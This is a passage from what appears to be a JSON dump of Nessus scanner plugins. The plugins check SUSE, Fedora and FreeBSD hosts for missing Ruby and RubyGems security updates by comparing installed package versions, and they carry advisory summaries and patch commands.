script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n script_bugtraq_id(68474, 74446, 75482);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ruby2.1 (SUSE-SU-2017:1067-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby2.1 update to version 2.1.9 fixes the following issues:\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when\n fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a\n vulnerability through overly permissive matching of\n hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in\n the encodes() function (bsc#887877) Bugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy\n environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack\n (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=887877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4975/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1855/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3900/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7551/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2339/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171067-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b050ba23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-624=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-624=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-624=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-624=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:44", "description": "Update to RubyGems 2.2.5.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-20T00:00:00", "type": "nessus", "title": "Fedora 21 : rubygems-2.2.5-100.fc21 (2015-13157)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-13157.NASL", "href": "https://www.tenable.com/plugins/nessus/85553", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-13157.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85553);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-13157\");\n\n script_name(english:\"Fedora 21 : rubygems-2.2.5-100.fc21 (2015-13157)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.2.5.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/164236.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40313ff4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"rubygems-2.2.5-100.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:48", "description": "Jonathan Claudius reports :\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specifically a SRV record\n_rubygems._tcp under the original requested domain.\n\nRubyGems did not validate the hostname returned in the SRV record before sending requests to it. This left clients open to a DNS hijack attack, whereby an attacker could return a SRV of their choosing and get the client to use it.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "nessus", "title": "FreeBSD : rubygems -- request hijacking vulnerability (a0089e18-fc9e-11e4-bc58-001e67150279)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby20-gems", "p-cpe:/a:freebsd:freebsd:ruby21-gems", "p-cpe:/a:freebsd:freebsd:ruby22-gems", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A0089E18FC9E11E4BC58001E67150279.NASL", "href": "https://www.tenable.com/plugins/nessus/83513", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83513);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3900\");\n\n script_name(english:\"FreeBSD : rubygems -- request hijacking vulnerability (a0089e18-fc9e-11e4-bc58-001e67150279)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Claudius reports :\n\nRubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specifically a SRV record\n_rubygems._tcp under the original requested domain.\n\nRubyGems did not validate the hostname returned in the SRV record\nbefore sending requests to it. This left clients open to a DNS hijack\nattack, whereby an attacker could return a SRV of their choosing and\nget the client to use it.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=200264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html\"\n );\n # https://vuxml.freebsd.org/freebsd/a0089e18-fc9e-11e4-bc58-001e67150279.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a870b517\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby20-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby21-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby22-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby20-gems<2.4.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby21-gems<2.4.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby22-gems<2.4.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:28", "description": "Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygems-2.4.8-100.fc23 (2015-12501)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-12501.NASL", "href": "https://www.tenable.com/plugins/nessus/85309", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12501.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85309);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-12501\");\n\n script_name(english:\"Fedora 23 : rubygems-2.4.8-100.fc23 (2015-12501)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163502.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3484cb87\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygems-2.4.8-100.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:16:26", "description": "Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygems-2.4.8-100.fc22 (2015-12574)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12574.NASL", "href": "https://www.tenable.com/plugins/nessus/85312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12574.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85312);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", 